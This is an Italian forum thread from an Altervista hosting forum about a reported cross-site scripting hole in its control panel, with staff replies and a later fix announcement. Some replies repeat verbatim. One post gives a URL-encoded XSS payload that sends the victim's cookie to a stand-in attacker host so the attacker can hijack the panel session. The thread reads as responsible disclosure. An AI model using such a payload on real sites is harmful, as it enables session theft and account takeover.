Vulnerabilità su Altervista

Che mi dite del seguente articolo?
http://www.zone-h.it/it/news/read/id=57/

Grazie

[Gianluca]

In realtà non è stata inviata a noi alcuna notifica relativa al problema così descritto da zone-h, era stata inviata una segnalazione (a cui è stato risposto) relativa alla possibilità per un utente sprovveduto di concedere, anche se per un tempo limitato a pochi minuti, l'accesso al proprio pannello incollando il proprio url ad esempio sul forum o altrove e di conseguenza la possibilità di andare a visualizzare dell'html (e quindi javascript) nel codice di risposta delle varie sezioni del pannello.

Tuttavia, come peraltro evidenziato anche nell'articolo, il problema non comporta l'accesso non autorizzato al pannello di controllo da parte di terzi, a meno che non sia il proprietario stesso dell'account a fornirlo, loggato e con una sessione attiva, secondo le modalità sopra descritte e riportate nell'articolo stesso.

In una delle successive versioni del pannello questo problema sarà corretto rendendo "invisibile" al membro il dato di sessione in modo che nemmeno per errore possa comunicarlo a terzi concedendovi quindi l'accesso.

[edit]
Faccio una rettifica doverosa: la notifica in merito a quanto descritto nell'articolo (che erroneamente avevo datato 3 Settembre 2005 anzichè 9 Marzo 2006) è arrivata il 4 Marzo.
[/edit]

In realtà non è stata inviata a noi alcuna notifica relativa al problema così descritto da zone-h, era stata inviata una segnalazione (a cui è stato risposto) relativa alla possibilità per un utente sprovveduto di concedere, anche se per un tempo limitato a pochi minuti, l'accesso al proprio pannello incollando il proprio url ad esempio sul forum o altrove e di conseguenza la possibilità di andare a visualizzare dell'html (e quindi javascript) nel codice di risposta delle varie sezioni del pannello.

Tuttavia, come peraltro evidenziato anche nell'articolo, il problema non comporta l'accesso non autorizzato al pannello di controllo da parte di terzi, a meno che non sia il proprietario stesso dell'account a fornirlo, loggato e con una sessione attiva, secondo le modalità sopra descritte e riportate nell'articolo stesso.

In una delle successive versioni del pannello questo problema sarà corretto rendendo "invisibile" al membro il dato di sessione in modo che nemmeno per errore possa comunicarlo a terzi concedendovi quindi l'accesso.

Salve, la segnalazione è stata inviata ad Altervista sabato scorso all'indrizzo feedback@altervista.org con i dettagli della vulnerabilità.

Mi permetto di fornire alcune precisazione in merito a quanto da voi esposto.. Il problema comporta invece l'accesso non autorizzato da parte di terzi al pannello di controllo. Non c'è bisogno che la vittima debba comunicare all'attaccante il sid, dato che questo è presente nel cookie e può essere conosciuto dall'attaccante grazie al cross-site scripting . E' infatti sufficiente che la vittima clicchi su un un url come il seguente

http://s4.altervista.org:8080/lf.pl?input= %3Cscript%3Edocument.location%3D%22http%3A%2F%2Fsi to_attacker.org%2Fget_cookie?%22%2Bdocument.cookie %3C%2Fscript%3E

per far si che l'attaccante ottenga il cookie, e quindi il sid, per accedere al pannello di amministrazione.

Il tutto ovviamente funge nel caso la vittima sia loggata, la durata della sessione prima della scadenza per mancata attività è di circa mezz'ora ( o forse di più)... e ciò potrebbe essere sufficiente all'attaccante per compiere attività illecite ai danni dellla vittima.

Considerando la semplicità con cui è possibile "indurre" la vittima a cliccare su un link come il precedente (email, chat, forum, o magari visitando un sito malevolo in hosting su altervista) il problema sarebbe da sistemare quanto prima.

Ulteriori dettagli sono descriti nell'articolo citato.

Saluti.

[Gianluca]

Hai fatto bene a segnalarlo e confermo anche la ricezione dell'email (vedi il mio edit sopra).

Estendendo quanto ho scritto sopra in realtà sia il comunicare il proprio sid su un forum piuttosto che cliccare su un url ad hoc e quindi inviare il proprio cookie produce fondamentalmente gli stessi risultati nella misura in cui sia il sid che il cookie stesso contengono un'informazione che ha validità per un tempo ristretto e quindi l'utente dovrebbe cliccare su tale link nel momento stesso in cui ha il suo pannello di controllo aperto ed è attivo.

In buona sostanza quindi se una persona che non è loggata e attiva inviasse a terzi il suo cookie d'accesso o direttamente il suo sid in realtà invierebbe un'informazione che non avrebbe alcuna utilità in quanto non permetterebbe di fare alcun login, d'altra parte questo capita proprio perchè la sessione e il relativo cookie di sessione perdono validità pochi minuti dopo che un utente non compie nessuna azione e immediatamente dopo che fa il logout.

Visto comunque il diffondersi di questo genere di pratiche e purtroppo la disattenzione di alcune persone che talvolta postano spesso anche sul nostro forum i loro url di accesso completi certamente in uno dei prossimi aggiornamenti del pannello, in tempi brevi, sarà modificata in parte la struttura stessa del pannello in modo da evitare anche l'insorgere di un problema simile.

Hai fatto bene a segnalarlo e confermo anche la ricezione dell'email (vedi il mio edit sopra).

Estendendo quanto ho scritto sopra in realtà sia il comunicare il proprio sid su un forum piuttosto che cliccare su un url ad hoc e quindi inviare il proprio cookie produce fondamentalmente gli stessi risultati nella misura in cui sia il sid che il cookie stesso contengono un'informazione che ha validità per un tempo ristretto e quindi l'utente dovrebbe cliccare su tale link nel momento stesso in cui ha il suo pannello di controllo aperto ed è attivo.

In buona sostanza quindi se una persona che non è loggata e attiva inviasse a terzi il suo cookie d'accesso o direttamente il suo sid in realtà invierebbe un'informazione che non avrebbe alcuna utilità in quanto non permetterebbe di fare alcun login, d'altra parte questo capita proprio perchè la sessione e il relativo cookie di sessione perdono validità pochi minuti dopo che un utente non compie nessuna azione e immediatamente dopo che fa il logout.

Visto comunque il diffondersi di questo genere di pratiche e purtroppo la disattenzione di alcune persone che talvolta postano spesso anche sul nostro forum i loro url di accesso completi certamente in uno dei prossimi aggiornamenti del pannello, in tempi brevi, sarà modificata in parte la struttura stessa del pannello in modo da evitare anche l'insorgere di un problema simile.

Il problema di fondo è che l'utente non si accorge di avere inviato il cookie all'attaccante quando clicca sul un link creato ad hoc, il quale potrebbe essere offuscato opportunamente. E ciò è diverso dal fatto che un utente possa postare erroneamente sul forum l'url completo. In tal caso direi che si tratti di un errore dell'utente, mentre il cliccare su un link, o visitare un sito web di terzi non dovrebbe compromettere in alcun modo la sicurezza di altri siti.
Inoltre il cookie ha si una validità ristretta, ma se l'attaccante ottiene il sid nella sezione temporale necessaria, può anche , nel caso peggiore, cancellare tutti i file presenti. Inoltre la validità del cookie in seguito ad inattività è di circa 30 minuti (tempo da me misurato qualche giorno fa, ma non sono andato oltre).

[Gianluca]

Il pannello è stato modificato in modo che se anche l'utente dovesse durante i 30 minuti in cui la sua sessione è attiva cliccare su un link fatto ad hoc come quello illustrato nell'articolo, o simili, l'azione non produrrebbe più alcuna conseguenza.

Inoltre la sessione di lavoro non è più manifesta sull'url, questa modifica impedisce, che qualsiasi membro possa involontariamente dare l'accesso al suo spazio pubblicando l'url d'accesso al suo pannello.